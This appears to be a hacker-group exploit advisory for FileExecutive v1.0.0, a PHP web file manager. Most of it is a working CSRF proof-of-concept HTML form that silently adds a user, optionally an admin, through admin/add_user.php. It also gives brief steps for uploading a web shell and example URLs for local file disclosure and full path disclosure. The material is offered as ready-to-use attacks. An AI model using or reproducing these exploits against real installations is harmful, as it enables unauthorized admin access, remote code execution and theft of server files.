============================================================================== [»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ] ============================================================================== [»] FileExecutive Multiple Vulnerabilities ============================================================================== [»] Script: [ FileExecutive v1.0.0 ] [»] Language: [ PHP ] [»] Site page:[ FileExecutive is a web-based file manager written in PHP. ] [»] Download: [ http://sourceforge.net/projects/fileexecutive/ ] [»] Founder:[ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ] [»] Greetz to:[ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ] [»] My Home:[ HackTeach.Org , Islam-Attack.Com ] ########################################################################### ===[ Exploits ]=== Add/Edit Admin CSRF: <html> <head> <title>FileExecutive Remote Add Admin Exploit [By:MvM]</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body> <form action='http://localhost/scripts/file/admin/add_user.php' method='POST' onSubmit='return chk(this)'> <th colspan='5'>Add A user<hr></th> <td>Username:</td> <input type='text' name='username' value='' maxlength='32' onkeyup="showHint(this.value)"> <Br> <td>Password:</td> <input type='text' name='password' value=''> <Br> <td>Name:</td> <input type='text' name='name' value='' maxlength='32'> <Br> <td>Root Directory:</td> <input type='text' name='root' value='' maxlength='200'> <Br> <td>Max Upload Size:</td> <input type='text' name='uload_maxsize' value='' size='8'> <Br> <select name='multiplier'> <option value='1' selected>Bytes</option> <option value='1024'>KB</option> <option value='1048576'>MB</option> </select> <td>Group:</td><td><select name='groupid' id='groupid'><option value='0' selected>No Group</option></select></td> <td>Use Group permissions?</td><td>Yes:<input type='radio' name='grp_perms' value='1'></td><td>No:<input type='radio' name='grp_perms' value='0' id="abc" checked></td> <td>Is user Admin?</td><td>Yes:<input type='radio' name='admin' value='1'></td><td>No:<input type='radio' name='admin' value='0' id="abc" checked> <td colspan='2'><fieldset><legend>Permissions</legend> <td><input type='checkbox' name='mkfile' value='1'>Create File</td> <td><input type='checkbox' name='mkdir' value='1'>Create Folder</td> <td><input type='checkbox' name='uload' value='1'>Upload</td> <td><input type='checkbox' name='rename' value='1'>Rename</td> <td><input type='checkbox' name='delete' value='1'>Delete</td> <td><input type='checkbox' name='edit' value='1'>Edit</td> <td><input type='checkbox' name='dload' value='1'>Download</td> <td><input type='checkbox' name='chmod' value='1'>Chmod</td> <td><input type='checkbox' name='move' value='1'>Move</td> <td> </td></tr> <td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td> </form> </body> </html> Shell Upload: [»] By Go To The End Of Page & Browse Your Shell 2 upload it <-=- Remote File Upload Vulnerability Local File Disclosure: [»] http://localhost/[path]/download.php?file=./LFD<-=- Local File Disclosure Vulnerability Full Path Disclosure: [»] http://localhost/[path]/listdir.php?dir=./FPD<-=- Full Path Disclosure Vulnerability Author: ViRuSMaN <- ###########################################################################
体验盒子
